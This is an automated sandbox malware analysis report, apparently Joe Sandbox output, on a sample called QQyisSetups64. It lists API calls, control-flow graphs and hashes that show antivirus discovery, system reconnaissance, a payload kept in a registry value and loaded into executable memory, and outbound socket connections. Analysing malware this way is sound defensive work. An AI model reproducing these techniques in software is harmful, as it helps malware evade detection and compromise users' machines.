                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03786AC2
                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 03786ADB
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 03786B12
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 03786B19
                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03786B3F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03786B49
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 03786B5D
                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03786B85
                                                                                                                                                                                                                      • GetSidSubAuthorityCount.ADVAPI32 ref: 03786B98
                                                                                                                                                                                                                      • GetSidSubAuthority.ADVAPI32(00000000), ref: 03786BA6
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 03786BB5
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03786BC2
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 03786C1B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                                                                                                                      • String ID: -N/$NO/$None/%s
                                                                                                                                                                                                                      • API String ID: 3036438616-3095023699
                                                                                                                                                                                                                      • Opcode ID: aebad1596d24c3afa154e75a799a9efff3f7d181e1543a8750806876abb7d2c5
                                                                                                                                                                                                                      • Instruction ID: 5abe2f44bb5d8f9dda52cf37cae31c0bee42939a3f0e74892ba8311ac13059e9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aebad1596d24c3afa154e75a799a9efff3f7d181e1543a8750806876abb7d2c5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1641C4B0A40618BFDB20FB64DC88FEF7B78EB89314F048595FA0596142DA38D990CF61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 755 3786150-37861a5 call 3796770 call 379004b 760 3786201-3786228 CoCreateInstance 755->760 761 37861a7-37861ae 755->761 762 378622e-3786282 760->762 763 3786422-378642f lstrlenW 760->763 764 37861b0-37861b2 call 3786050 761->764 775 3786288-37862a2 762->775 776 378640a-3786418 762->776 766 3786441-3786450 763->766 767 3786431-378643b lstrcatW 763->767 768 37861b7-37861b9 764->768 770 378645a-378647a call 378f00a 766->770 771 3786452-3786457 766->771 767->766 773 37861db-37861ff call 379004b 768->773 774 37861bb-37861d9 lstrcatW * 2 768->774 771->770 773->760 773->764 774->773 775->776 782 37862a8-37862b4 775->782 776->763 779 378641a-378641f 776->779 779->763 783 37862c0-3786363 call 3796770 wsprintfW RegOpenKeyExW 782->783 786 37863e9-37863ff 783->786 787 3786369-37863ba call 3796770 RegQueryValueExW 783->787 790 3786402-3786404 786->790 791 37863dc-37863e3 RegCloseKey 787->791 792 37863bc-37863da lstrcatW * 2 787->792 790->776 790->783 791->786 792->791
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378618B
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(037B1F10,037A510C,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 037861CD
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(037B1F10,037A535C,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 037861D9
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(037A2480,00000000,00000017,037A578C,?,?,453DC9E3,00000AD4,00000000,75A373E0), ref: 03786220
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 037862CE
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 03786336
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0378635F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03786376
                                                                                                                                                                                                                        • Part of subcall function 03786050: _memset.LIBCMT ref: 0378607C
                                                                                                                                                                                                                        • Part of subcall function 03786050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03786088
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                                                                                                                                      • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                                                                      • API String ID: 1221949200-1583895642
                                                                                                                                                                                                                      • Opcode ID: 057029a70de8c3f8a6167f18a96efeefc436d125e6435fe5ae6ff29d4cd65b2a
                                                                                                                                                                                                                      • Instruction ID: 4da6991b806cfacb5f697f4789e8cfa44e2b78a473866a071467712b93d70011
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 057029a70de8c3f8a6167f18a96efeefc436d125e6435fe5ae6ff29d4cd65b2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 678174F1A40628AFDB20EB54CC55FAEB7B8EB88704F0445C9F719A7246D6749E40CF64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A373E0,00000AD4,00000000), ref: 03788132
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,A:\), ref: 03788166
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,B:\), ref: 03788176
                                                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037881A6
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 037881B7
                                                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 037881CE
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000AD4,?), ref: 03788204
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 03788228
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 03788233
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                                                                                                                      • String ID: A:\$B:\
                                                                                                                                                                                                                      • API String ID: 950920757-1009255891
                                                                                                                                                                                                                      • Opcode ID: 997d5ab36284bb1326ed52a5275b98506e0f3adc787281ee308acc432959b22b
                                                                                                                                                                                                                      • Instruction ID: 396b94c387103cf7bba237a6793edab1e785c40f40f622c44de222689740aaf3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 997d5ab36284bb1326ed52a5275b98506e0f3adc787281ee308acc432959b22b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4441F671A41618EFDB20EF64DD84AEEB3B8EF84700F448599DE0AA3141EB74DA05CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03785320: InterlockedDecrement.KERNEL32(00000008), ref: 0378536F
                                                                                                                                                                                                                        • Part of subcall function 03785320: SysFreeString.OLEAUT32(00000000), ref: 03785384
                                                                                                                                                                                                                        • Part of subcall function 03785320: SysAllocString.OLEAUT32(037A5148), ref: 037853D5
                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,037A5148,037869A4,037A5148,00000000,75A373E0), ref: 037867F4
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 037867FE
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 03786816
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0378681D
                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0378683F
                                                                                                                                                                                                                      • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03786871
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0378687B
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 037868E6
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 037868ED
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                                                                                                                      • String ID: NONE_MAPPED
                                                                                                                                                                                                                      • API String ID: 1317816589-2950899194
                                                                                                                                                                                                                      • Opcode ID: d392be42587114b3e33a7ead60407aa44f4d0a0fcc3e70a6dd75aedd7a0e0f02
                                                                                                                                                                                                                      • Instruction ID: 4520d25594a180c023c0ab8f003400462eab7ccc03290395d9342949c0c66774
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d392be42587114b3e33a7ead60407aa44f4d0a0fcc3e70a6dd75aedd7a0e0f02
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5841A5B5A40618AFDB20EB64DC48FAFB37CEBC5700F008998E709A7141DB745A859F60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,771ADF80,00000000,75A373E0), ref: 03786C8B
                                                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03786CAA
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03786CE1
                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 03786CF4
                                                                                                                                                                                                                      • swprintf.LIBCMT ref: 03786D39
                                                                                                                                                                                                                      • swprintf.LIBCMT ref: 03786D4C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                                                                                                                      • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                                                                                                                      • API String ID: 3202570353-3501811827
                                                                                                                                                                                                                      • Opcode ID: c086429abb4dc406db045a5dff3843b07021d2e7199ac23d144dfde2a112dd8e
                                                                                                                                                                                                                      • Instruction ID: c593def81403e60bb04a4e1cadfb523b9af37f651abbe7268ff30f7fd4b1472d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c086429abb4dc406db045a5dff3843b07021d2e7199ac23d144dfde2a112dd8e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 403172B6D4020C9BDB14DFE9DC45FEEB7B9FB88700F50821DEA1AA7241D6746905CB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateDXGIFactory.DXGI(037A579C,?,453DC9E3,771ADF80,00000000,75A373E0), ref: 03786F4A
                                                                                                                                                                                                                      • swprintf.LIBCMT ref: 0378711E
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037871C7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                                                                                                                      • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                                                                                                                      • API String ID: 3803070356-257307503
                                                                                                                                                                                                                      • Opcode ID: ed470a54e84af8251f73640d9671323164cf75233aac1a3c86870b4f8794e75f
                                                                                                                                                                                                                      • Instruction ID: bd1d84cbbe1308a449f4dd53aabd64eb78feb8ff98e2ac32d4b535260041cf93
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed470a54e84af8251f73640d9671323164cf75233aac1a3c86870b4f8794e75f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBE18971E402659FDF68DF64CC80BEEB375AF89700F2445D9D91AA7284D7309E818F91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02C85507
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C8552E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C85548
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C85563
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C85586
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 02C855B1
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C85605
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C85669
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C8568D
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C8569F
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C85726
                                                                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02C85799
                                                                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 02C857AC
                                                                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 02C857C4
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C857CE
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C857FE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                                                                                                                      • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                                                                                                                      • API String ID: 354323817-737951744
                                                                                                                                                                                                                      • Opcode ID: 0dd16d61dfe9bf9fd70d2334807e68faaaf624232f6a1342340d081460334d1d
                                                                                                                                                                                                                      • Instruction ID: 62933fded8fae5cabb0249ac52b4fbe6463fda049dae73a3f51cf1af67b094ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dd16d61dfe9bf9fd70d2334807e68faaaf624232f6a1342340d081460334d1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0891B6B5A40204BBEB20EF60DC48FAA77BEEB85744F508559F9099B240D7B59E40CFA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 488 3789e50-3789e85 GdipGetImagePixelFormat 489 3789e8a-3789eb1 488->489 490 3789e87 488->490 491 3789ec9-3789ecf 489->491 492 3789eb3-3789ec3 489->492 490->489 493 3789eeb-3789f04 GdipGetImageHeight 491->493 494 3789ed1-3789ee1 491->494 492->491 495 3789f09-3789f2c GdipGetImageWidth 493->495 496 3789f06 493->496 494->493 497 3789f2e 495->497 498 3789f31-3789f4e call 3789c30 495->498 496->495 497->498 501 3789f54-3789f68 498->501 502 378a055-378a05a 498->502 503 3789f6e-3789f87 GdipGetImagePaletteSize 501->503 504 378a0cf-378a0d7 501->504 505 378a2a4-378a2ba call 378f00a 502->505 508 3789f89 503->508 509 3789f8c-3789f98 503->509 506 378a20a-378a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 504->506 507 378a0dd-378a11a GdipBitmapLockBits 504->507 514 378a281-378a283 506->514 512 378a14a-378a177 507->512 513 378a11c-378a121 507->513 508->509 515 3789f9a-3789fa5 call 3789650 509->515 516 3789fb2-3789fba 509->516 523 378a179-378a18e call 37907f2 512->523 524 378a1bf-378a1de GdipBitmapUnlockBits 512->524 519 378a140-378a145 513->519 520 378a123 513->520 521 378a2a2 514->521 522 378a285 514->522 515->516 538 3789fa7-3789fb0 call 379c660 515->538 517 3789fbc-3789fca call 378f673 516->517 518 3789fd0-3789fd5 call 3781280 516->518 535 3789fda-3789fe5 517->535 539 3789fcc-3789fce 517->539 518->535 519->505 527 378a12b-378a13e call 378f639 520->527 521->505 529 378a28d-378a2a0 call 378f639 522->529 543 378a200-378a205 call 3781280 523->543 544 378a190-378a197 523->544 524->514 532 378a1e4-378a1e7 524->532 527->519 547 378a125 527->547 529->521 550 378a287 529->550 532->514 541 3789fe7-3789fe9 535->541 538->541 539->541 548 3789feb-3789fed 541->548 549 378a016-378a030 GdipGetImagePalette 541->549 543->506 544->543 551 378a1ec-378a1f1 call 3781280 544->551 552 378a19e-378a1bd 544->552 553 378a1f6-378a1fb call 3781280 544->553 547->527 559 378a00c-378a011 548->559 560 3789fef 548->560 555 378a03b-378a040 549->555 556 378a032-378a038 549->556 550->529 551->553 552->523 552->524 553->543 561 378a04a-378a050 call 378cca0 555->561 562 378a042-378a048 555->562 556->555 559->505 563 3789ff7-378a00a call 378f639 560->563 561->502 562->561 564 378a05f-378a063 562->564 563->559 572 3789ff1 563->572 567 378a0a0-378a0c9 call 3789d80 SetDIBColorTable call 378a320 564->567 568 378a065 564->568 567->504 570 378a068-378a098 568->570 570->570 573 378a09a 570->573 572->563 573->567
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789E7B
                                                                                                                                                                                                                      • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789EFC
                                                                                                                                                                                                                      • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789F24
                                                                                                                                                                                                                      • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03789F7F
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 03789FC0
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
                                                                                                                                                                                                                        • Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378A000
                                                                                                                                                                                                                      • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0378A028
                                                                                                                                                                                                                      • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0378A0B7
                                                                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0378A112
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378A134
                                                                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0378A183
                                                                                                                                                                                                                      • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0378A1D0
                                                                                                                                                                                                                      • GdipCreateBitmapFromScan0.GDIPLUS(?,?,037A5A78,00022009,?,00000000,?,00000000), ref: 0378A22C
                                                                                                                                                                                                                      • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0378A24C
                                                                                                                                                                                                                      • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0378A267
                                                                                                                                                                                                                      • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0378A274
                                                                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0378A27B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378A296
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                                                                                                                      • String ID: &
                                                                                                                                                                                                                      • API String ID: 640422297-3042966939
                                                                                                                                                                                                                      • Opcode ID: ce5ccca8801dc134247588db63b14c834bcfadaf5988a46bd6e2949a3cc5a16d
                                                                                                                                                                                                                      • Instruction ID: 1ff9384a729c7546cd53dc5950459aa04982dc356c1f6b33502bafcfe94f7c1b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce5ccca8801dc134247588db63b14c834bcfadaf5988a46bd6e2949a3cc5a16d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6D183F1A40619DFDB64EF55CC84BAAB3B4EF88304F0485ADE709A7201D774A985CF64

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 03782DBB
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03782DC7
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 03782DCD
                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 03782DFA
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03782E26
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03782E32
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03782E51
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03782E5D
                                                                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 03782E6B
                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 03782E8D
                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 03782EAB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                                                                      • String ID: 0u
                                                                                                                                                                                                                      • API String ID: 640718063-3203441087
                                                                                                                                                                                                                      • Opcode ID: 07a7e0404cb50acee399c4baa44b1ffc20edd592831b00d5c85b5fe75497ec42
                                                                                                                                                                                                                      • Instruction ID: 6853a56888d95dce387b3e3687356df6ba96d985ab994e9b5b10d1af7aaf9b6d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07a7e0404cb50acee399c4baa44b1ffc20edd592831b00d5c85b5fe75497ec42
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B06171B1A40704AFE720EFA4DC45FAAB7B8FF4DB10F104519F655AB2C1D7B4A9048B64

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C82D9B
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C82DA7
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 02C82DAD
                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 02C82DDA
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02C82E06
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C82E12
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02C82E31
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C82E3D
                                                                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 02C82E4B
                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 02C82E6D
                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 02C82E8B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
